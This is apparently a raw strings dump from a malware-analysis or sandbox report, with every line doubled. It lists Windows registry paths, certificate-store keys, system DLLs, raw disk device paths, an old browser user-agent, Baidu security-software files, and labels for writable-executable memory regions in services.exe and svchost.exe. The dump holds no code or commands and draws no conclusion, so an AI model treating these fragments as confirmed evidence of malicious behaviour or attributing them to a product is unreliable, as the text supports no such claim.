Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
system32\winlogon.exe
GWintrust.dll
GWintrust.dll
Crypt32.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
6BE417DD-264A-4678-A036-74D2173ECCEB
d-d-d
d-d-d
D823ABCA-A92F-429d-9E11-3779B5F682AA
D823ABCA-A92F-429d-9E11-3779B5F682AA
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUpdate.dll
BDMUpdate.dll
B.bdtmp
B.bdtmp
.old_
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
\Global.db
\Global.db
Ciphlpapi.dll
Ciphlpapi.dll
C\\.\PhysicalDrive%d
C\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
0123456789
0123456789
BaidusdTray.exe
BaidusdTray.exe
services.exe_724_rwx_00760000_00001000:
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll
svchost.exe_1108_rwx_01BE0000_00001000:
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll